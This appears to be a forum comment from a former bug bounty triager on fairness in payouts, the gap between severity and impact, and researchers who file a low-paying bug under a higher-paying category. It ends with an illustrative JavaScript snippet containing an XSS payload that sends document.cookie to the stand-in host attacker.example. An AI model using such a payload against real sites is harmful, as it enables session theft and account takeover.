This speaks to a couple of issues that bothered me while working in bug bounty triage.

> Alex informed my employer (as far as I am aware) that I had found a vulnerability, and had used it to access sensitive data. He then explained that *the vulnerability I found was trivial and of little value*, and at the same time said that my reporting and handling of the vulnerability submission had caused huge concern at Facebook.

[my emphasis]

There is a conceptual separation between the severity of an issue and its impact. Simplifying things much further than the situation described in the piece: you could have an admin account with the password "password". This is a stupid issue. The fix is to change the admin password. How much of a bounty should be paid for this report?

One school of thought is that the value of the report is related to what you can accomplish by exploiting it. This is clearly the right approach if you're assessing the issue's value *to an attacker*. It has some problems in the bug bounty context -- a major one is that it feels subjectively unfair to the company! They don't want to pay 100x more for the same vulnerability just because, this time, it happened to have more sensitive stuff behind it.

Another problem is that, as here, you often see a chain of vulnerabilities, each of very little consequence in isolation, that combine into something much greater than the sum of the parts. (I recall a published writeup, which I can no longer find, in which one important step was a logout CSRF. Nobody cares about those.) The policy of "stop investigating as soon as you find anything" rules out this kind of "whole is greater than the sum of the parts" finding by definition.

> Playing By The Rules

> Microsoft (in my opinion) has done the best job of explaining exactly how far they would like a researcher to take a vulnerability. Google and Yahoo imply that you should report a vulnerability immediately, but do not clarify how far you should go in determining impact. Tumblr, on the other hand, puts in writing the policy of just about every bounty program. The better your PoC shows impact, the more you are likely to get paid. Further, the better a researcher can understand and describe impact, the more likely they are to receive a greater reward.

This bothers me from a fairness perspective. I have personally seen essentially the same report on different pages of a webapp get paid out differently because the researchers provided different *speculation* about what might be possible using their exploit. The guy who got paid less was careful about following the rules: he asked for guidance about exactly what and how he could investigate, and then claimed only what he was able to demonstrate. The guy who got paid more made a more generic claim that "this demonstrates SQLi, and writing to the database might be possible". I could not establish whether writing to the database *was in fact possible*, for the same reason neither of them had tried: it might have been unacceptably disruptive to the company. So I passed the speculation through, and the payout ended up being higher.

The lesson here is, "claim the moon and the stars."
But I feel that means the ecosystem is unhealthy; that's not what I think the lesson *should be*.

Companies always say they will investigate the full impact of a vulnerability when you follow the protocol they urge of "as soon as you find something, report it and don't try to escalate". But actually investigating that full impact is nearly impossible, even when you're trying in good faith.

---

Sometimes you're not trying in good faith. I have also seen exactly the same issue paid out differently depending on the category the researcher files it under. Many programs publish payout schedules by category. In this case, the schedule contained a mix of technical categories ("XSS") and functional categories ("account takeover"). One researcher found a way to present an issue from a low-paying technical category as a high-paying functional category. I repeatedly noted in my reports to the company that this researcher was getting paid quite a lot more for the same vulnerability than researchers who didn't know about the loophole. This state of affairs never changed; I assume the main concern was maintaining the relationship with the loophole guy. But obviously, this sort of thing directly falsifies the claim that "we will investigate the full impact of the issue you report and pay out appropriately."
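To make that loophole concrete, here is a minimal sketch of how one reflected XSS could be written up under either category. This is hypothetical and not from the program in question; the endpoint, the attacker domain, and the payloads are all invented for illustration.

    // Hypothetical illustration only; every name and URL here is invented.
    // Same injection point, two very different-sounding reports.

    // Filed as "XSS" (technical category, lower payout):
    // prove the injection exists and stop there.
    const xssPoc = '<script>alert(document.domain)</script>';

    // Filed as "account takeover" (functional category, higher payout):
    // the identical bug, but the PoC ships the victim's session cookie to an
    // attacker-controlled host, so it reads as a working takeover chain
    // (assuming, for the sake of the example, the cookie isn't HttpOnly).
    const takeoverPoc =
      '<script>' +
      'fetch("https://attacker.example/c?d=" + encodeURIComponent(document.cookie))' +
      '</script>';

    console.log(xssPoc);
    console.log(takeoverPoc);

Nothing about the underlying bug changes between those two write-ups; only the framing changes, and a category-keyed payout schedule only sees the framing.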